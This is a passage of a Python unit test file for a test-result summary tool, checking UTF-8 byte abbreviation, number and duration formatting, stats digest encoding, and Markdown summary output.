self.assertEqual('a…', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 4)) self.assertEqual('…', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 3)) # mixed utf bytes: lengths=[1, 2, 3, 4, 4, 3, 2, 1] self.assertEqual('a»▉𝒂𝒂▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 21)) self.assertEqual('a»▉𝒂𝒂▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 20)) self.assertEqual('a»▉𝒂…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 19)) self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 18)) self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 17)) self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 16)) self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 15)) self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 14)) self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 13)) self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 12)) self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 11)) self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 10)) self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 9)) self.assertEqual('a»…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 8)) self.assertEqual('a»…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 7)) self.assertEqual('a…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 6)) self.assertEqual('a…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 5)) self.assertEqual('a…', abbreviate_bytes('a»▉𝒂𝒂▉»a', 4)) self.assertEqual('…', abbreviate_bytes('a»▉𝒂𝒂▉»a', 3)) # odd number of characters # 4 bytes utf characters self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 101)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 100)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 99)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 98)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 97)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 96)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 95)) self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 94)) self.assertEqual('𝒂𝒃𝒄…𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 27)) self.assertEqual('𝒂𝒃𝒄…𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 26)) self.assertEqual('𝒂𝒃𝒄…𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 25)) self.assertEqual('𝒂…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 7)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 6)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 5)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 4)) self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 3)) # 1 byte utf characters self.assertEqual('ab…xy', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 7)) self.assertEqual('ab…y', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 6)) self.assertEqual('a…y', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 5)) self.assertEqual('a…', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 4)) self.assertEqual('…', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 3)) # mixed utf bytes: lengths=[1, 2, 3, 4, 1, 2, 3] self.assertEqual('a»▉𝒂a»▉', abbreviate_bytes('a»▉𝒂a»▉', 17)) self.assertEqual('a»▉𝒂a»▉', abbreviate_bytes('a»▉𝒂a»▉', 16)) self.assertEqual('a»▉…a»▉', abbreviate_bytes('a»▉𝒂a»▉', 15)) self.assertEqual('a»▉…»▉', abbreviate_bytes('a»▉𝒂a»▉', 14)) self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 13)) self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 12)) self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 11)) self.assertEqual('a»…▉', abbreviate_bytes('a»▉𝒂a»▉', 10)) self.assertEqual('a»…▉', abbreviate_bytes('a»▉𝒂a»▉', 9)) self.assertEqual('a…▉', abbreviate_bytes('a»▉𝒂a»▉', 8)) self.assertEqual('a…▉', abbreviate_bytes('a»▉𝒂a»▉', 7)) self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 6)) self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 5)) self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 4)) self.assertEqual('…', abbreviate_bytes('a»▉𝒂a»▉', 3)) self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 2)) self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 1)) self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 0)) self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', -1)) def test_get_test_name(self): self.assertEqual('Unknown test', get_test_name(None, None, None)) self.assertEqual('test name', get_test_name(None, None, 'test name')) self.assertEqual('class name ‑ Unknown test', get_test_name(None, 'class name', None)) self.assertEqual('class name ‑ test name', get_test_name(None, 'class name', 'test name')) self.assertEqual('file name ‑ Unknown test', get_test_name('file name', None, None)) self.assertEqual('file name ‑ test name', get_test_name('file name', None, 'test name')) self.assertEqual('file name ‑ class name ‑ Unknown test', get_test_name('file name', 'class name', None)) self.assertEqual('file name ‑ class name ‑ test name', get_test_name('file name', 'class name', 'test name')) def test_get_formatted_digits(self): self.assertEqual(get_formatted_digits(None), (3, 0)) self.assertEqual(get_formatted_digits(None, 1), (3, 0)) self.assertEqual(get_formatted_digits(None, 123), (3, 0)) self.assertEqual(get_formatted_digits(None, 1234), (5, 0)) self.assertEqual(get_formatted_digits(0), (1, 0)) self.assertEqual(get_formatted_digits(1, 2, 3), (1, 0)) self.assertEqual(get_formatted_digits(10), (2, 0)) self.assertEqual(get_formatted_digits(100), (3, 0)) self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0)) with temp_locale('en_US.utf8'): self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0)) with temp_locale('de_DE.utf8'): self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0)) self.assertEqual(get_formatted_digits(dict()), (3, 3)) self.assertEqual(get_formatted_digits(dict(number=1)), (1, 3)) self.assertEqual(get_formatted_digits(dict(number=12)), (2, 3)) self.assertEqual(get_formatted_digits(dict(number=123)), (3, 3)) self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3)) with temp_locale('en_US.utf8'): self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3)) with temp_locale('de_DE.utf8'): self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3)) self.assertEqual(get_formatted_digits(dict(delta=1)), (3, 1)) self.assertEqual(get_formatted_digits(dict(number=1, delta=1)), (1, 1)) self.assertEqual(get_formatted_digits(dict(number=1, delta=12)), (1, 2)) self.assertEqual(get_formatted_digits(dict(number=1, delta=123)), (1, 3)) self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5)) with temp_locale('en_US.utf8'): self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5)) with temp_locale('de_DE.utf8'): self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5)) def test_get_magnitude(self): self.assertEqual(None, get_magnitude(None)) self.assertEqual(+0, get_magnitude(+0)) self.assertEqual(-1, get_magnitude(-1)) self.assertEqual(+2, get_magnitude(+2)) self.assertEqual(None, get_magnitude(dict())) self.assertEqual(+0, get_magnitude(dict(number=+0))) self.assertEqual(+1, get_magnitude(dict(number=+1))) self.assertEqual(-2, get_magnitude(dict(number=-2))) self.assertEqual(3, get_magnitude(dict(number=3, delta=5))) self.assertEqual(3, get_magnitude(dict(duration=3))) self.assertEqual(3, get_magnitude(dict(duration=3, delta=5))) self.assertEqual(None, get_magnitude(dict(delta=5))) def test_get_delta(self): self.assertEqual(None, get_delta(None)) self.assertEqual(None, get_delta(+0)) self.assertEqual(None, get_delta(-1)) self.assertEqual(None, get_delta(+2)) self.assertEqual(None, get_delta(dict())) self.assertEqual(None, get_delta(dict(number=+0))) self.assertEqual(None, get_delta(dict(number=+1))) self.assertEqual(None, get_delta(dict(number=-2))) self.assertEqual(5, get_delta(dict(number=3, delta=5))) self.assertEqual(None, get_delta(dict(duration=3))) self.assertEqual(5, get_delta(dict(duration=3, delta=5))) self.assertEqual(5, get_delta(dict(delta=5))) def test_as_short_commit(self): self.assertEqual(as_short_commit(None), None) self.assertEqual(as_short_commit(''), None) self.assertEqual(as_short_commit('commit'), 'commit') self.assertEqual(as_short_commit('0123456789abcdef'), '01234567') self.assertEqual(as_short_commit('b469da3d223225fa3f014a3c9e9466b42a1471c5'), 'b469da3d') def test_as_delta(self): self.assertEqual(as_delta(0, 1), '±0') self.assertEqual(as_delta(+1, 1), '+1') self.assertEqual(as_delta(-2, 1), ' - 2') self.assertEqual(as_delta(0, 2), '±  0') self.assertEqual(as_delta(+1, 2), '+  1') self.assertEqual(as_delta(-2, 2), ' -   2') self.assertEqual(as_delta(1, 5), '+       1') self.assertEqual(as_delta(12, 5), '+     12') self.assertEqual(as_delta(123, 5), '+   123') self.assertEqual(as_delta(1234, 5), '+1 234') self.assertEqual(as_delta(1234, 6), '+  1 234') self.assertEqual(as_delta(123, 6), '+     123') with temp_locale('en_US.utf8'): self.assertEqual(as_delta(1234, 5), '+1 234') self.assertEqual(as_delta(1234, 6), '+  1 234') self.assertEqual(as_delta(123, 6), '+     123') with temp_locale('de_DE.utf8'): self.assertEqual(as_delta(1234, 5), '+1 234') self.assertEqual(as_delta(1234, 6), '+  1 234') self.assertEqual(as_delta(123, 6), '+     123') def test_as_stat_number(self): label = 'unit' self.assertEqual(as_stat_number(None, 1, 0, label), 'N/A unit') self.assertEqual(as_stat_number(1, 1, 0, label), '1 unit') self.assertEqual(as_stat_number(123, 6, 0, label), '     123 unit') self.assertEqual(as_stat_number(1234, 6, 0, label), '  1 234 unit') self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit') with temp_locale('en_US.utf8'): self.assertEqual(as_stat_number(123, 6, 0, label), '     123 unit') self.assertEqual(as_stat_number(1234, 6, 0, label), '  1 234 unit') self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit') with temp_locale('de_DE.utf8'): self.assertEqual(as_stat_number(123, 6, 0, label), '     123 unit') self.assertEqual(as_stat_number(1234, 6, 0, label), '  1 234 unit') self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit') self.assertEqual(as_stat_number(dict(number=1), 1, 0, label), '1 unit') self.assertEqual(as_stat_number(dict(number=1, delta=-1), 1, 1, label), '1 unit  - 1 ') self.assertEqual(as_stat_number(dict(number=2, delta=+0), 1, 1, label), '2 unit ±0 ') self.assertEqual(as_stat_number(dict(number=3, delta=+1), 1, 1, label), '3 unit +1 ') self.assertEqual(as_stat_number(dict(number=3, delta=+1), 1, 2, label), '3 unit +  1 ') self.assertEqual(as_stat_number(dict(number=3, delta=+1), 2, 2, label), '  3 unit +  1 ') self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit +  1 234 ') self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ') with temp_locale('en_US.utf8'): self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit +  1 234 ') self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ') with temp_locale('de_DE.utf8'): self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit +  1 234 ') self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ') self.assertEqual(as_stat_number(dict(delta=-1), 3, 1, label), 'N/A unit  - 1 ') self.assertEqual(as_stat_number(dict(number=1, delta=-2, new=3), 1, 1, label), '1 unit  - 2, 3 new ') self.assertEqual(as_stat_number(dict(number=2, delta=+0, new=3, gone=4), 1, 1, label), '2 unit ±0, 3 new, 4 gone ') self.assertEqual(as_stat_number(dict(number=3, delta=+1, gone=4), 1, 1, label), '3 unit +1, 4 gone ') def test_as_stat_duration(self): label = 'time' self.assertEqual(as_stat_duration(None, label), 'N/A time') self.assertEqual(as_stat_duration(0, None), '0s') self.assertEqual(as_stat_duration(0, label), '0s time') self.assertEqual(as_stat_duration(12, label), '12s time') self.assertEqual(as_stat_duration(72, label), '1m 12s time') self.assertEqual(as_stat_duration(3754, label), '1h 2m 34s time') self.assertEqual(as_stat_duration(-3754, label), '1h 2m 34s time') self.assertEqual(as_stat_duration(d(3754), label), '1h 2m 34s time') self.assertEqual(as_stat_duration(d(3754, 0), label), '1h 2m 34s time ±0s') self.assertEqual(as_stat_duration(d(3754, 1234), label), '1h 2m 34s time + 20m 34s') self.assertEqual(as_stat_duration(d(3754, -123), label), '1h 2m 34s time - 2m 3s') self.assertEqual(as_stat_duration(dict(delta=123), label), 'N/A time + 2m 3s') def test_get_stats_digest_undigest(self): digest = get_digest_from_stats(UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13, commit='commit' )) self.assertTrue(isinstance(digest, str)) self.assertTrue(len(digest) > 100) stats = get_stats_from_digest(digest) self.assertEqual(stats, UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13, commit='commit' )) def test_digest_ungest_string(self): digest = digest_string('abc') self.assertTrue(isinstance(digest, str)) self.assertTrue(len(digest) > 10) string = ungest_string(digest) self.assertEqual(string, 'abc') def test_get_stats_from_digest(self): self.assertEqual( get_stats_from_digest('H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP' 'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr' '+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH' 'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA'), UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13, commit='commit' ) ) def test_get_short_summary(self): self.assertEqual('No tests found', get_short_summary(UnitTestRunResults(files=0, errors=[], suites=0, duration=123, tests=0, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('10 tests found in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('All 10 tests pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=10, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('All 9 tests pass, 1 skipped in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=9, tests_skip=1, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('2 fail, 1 skipped, 7 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=7, tests_skip=1, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('3 errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('2 fail, 8 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=8, tests_skip=0, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('3 errors, 7 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=7, tests_skip=0, tests_fail=0, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('1 parse errors', get_short_summary(UnitTestRunResults(files=1, errors=errors, suites=0, duration=0, tests=0, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('1 parse errors, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=4, tests_succ=4, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('1 parse errors, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=5, tests_succ=4, tests_skip=1, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('1 parse errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=7, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) self.assertEqual('1 parse errors, 3 errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=10, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit'))) def test_get_short_summary_md(self): self.assertEqual(get_short_summary_md(UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13, commit='commit' )), ('4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:')) def test_get_short_summary_md_with_delta(self): self.assertEqual(get_short_summary_md(UnitTestRunDeltaResults( files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4), tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9), runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14), commit='commit', reference_type='type', reference_commit='0123456789abcdef' )), ('4 tests  - 5  5 :heavy_check_mark: +6  6 :zzz:  - 7  7 :x: +8  8 :fire:  - 9 ')) def test_get_long_summary_md_with_single_runs(self): self.assertEqual(get_long_summary_md(UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8, commit='commit' )), ('1 files  2 suites   3s :stopwatch:\n' '4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n' '\n' 'Results for commit commit.\n')) def test_get_long_summary_md_with_multiple_runs(self): self.assertEqual(get_long_summary_md(UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=0, commit='commit' )), ('1 files    2 suites   3s :stopwatch:\n' '4 tests   5 :heavy_check_mark:   6 :zzz:   7 :x:\n' '9 runs  10 :heavy_check_mark: 11 :zzz: 12 :x:\n' '\n' 'Results for commit commit.\n')) def test_get_long_summary_md_with_errors(self): self.assertEqual(get_long_summary_md(UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13, commit='commit' )), ('1 files    2 suites   3s :stopwatch:\n' '4 tests   5 :heavy_check_mark:   6 :zzz:   7 :x:   8 :fire:\n' '9 runs  10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n' '\n' 'Results for commit commit.\n')) def test_get_long_summary_md_with_deltas(self): self.assertEqual(get_long_summary_md(UnitTestRunDeltaResults( files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4), tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9), runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14), commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef' )), ('1 files  +  2    2 suites   - 3   3s :stopwatch: +4s\n' '4 tests  -   5    5 :heavy_check_mark: +  6    6 :zzz:  -   7    7 :x: +  8    8 :fire:  -   9 \n' '9 runs  +10  10 :heavy_check_mark:  - 11  11 :zzz: +12  12 :x:  - 13  13 :fire: +14 \n' '\n' 'Results for commit 12345678. ± Comparison against type commit 01234567.\n')) def test_get_long_summary_md_with_details_url_with_fails(self): self.assertEqual(get_long_summary_md( UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0, runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=0, commit='commit' ), 'https://details.url/' ), ('1 files  2 suites   3s :stopwatch:\n' '4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x:\n' '\n' 'For more details on these failures, see [this check](https://details.url/).\n' '\n' 'Results for commit commit.\n') ) def test_get_long_summary_md_with_details_url_with_errors(self): self.assertEqual(get_long_summary_md( UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=8, runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=8, commit='commit' ), 'https://details.url/' ), ('1 files  2 suites   3s :stopwatch:\n' '4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x: 8 :fire:\n' '\n' 'For more details on these errors, see [this check](https://details.url/).\n' '\n' 'Results for commit commit.\n') ) def test_get_long_summary_md_with_details_url_with_parse_errors(self): self.assertEqual(get_long_summary_md( UnitTestRunResults( files=2, errors=errors, suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=0, runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=0, commit='commit' ), 'https://details.url/' ), ('2 files  1 errors  2 suites   3s :stopwatch:\n' '4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x:\n' '\n' 'For more details on these parsing errors, see [this check](https://details.url/).\n' '\n' 'Results for commit commit.\n') ) def test_get_long_summary_md_with_details_url_with_fails_and_errors_and_parse_errors(self): self.assertEqual(get_long_summary_md( UnitTestRunResults( files=1, errors=errors, suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8, commit='commit' ), 'https://details.url/' ), ('1 files  1 errors  2 suites   3s :stopwatch:\n' '4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n' '\n' 'For more details on these parsing errors, failures and errors, see [this check](https://details.url/).\n' '\n' 'Results for commit commit.\n') ) def test_get_long_summary_md_with_details_url_without_fails_or_errors_or_parse_errors(self): self.assertEqual(get_long_summary_md( UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=0, runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=0, commit='commit' ), 'https://details.url/' ), ('1 files  2 suites   3s :stopwatch:\n' '4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x:\n' '\n' 'Results for commit commit.\n') ) def test_get_long_summary_with_digest_md_with_single_run(self): # makes gzipped digest deterministic with mock.patch('gzip.time.time', return_value=0): actual = get_long_summary_with_digest_md( UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8, commit='commit' ) ) self.assertEqual(actual, '1 files  2 suites   3s :stopwatch:\n' '4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n' '\n' 'Results for commit commit.\n' '\n' '[test-results]:data:application/gzip;base64,' 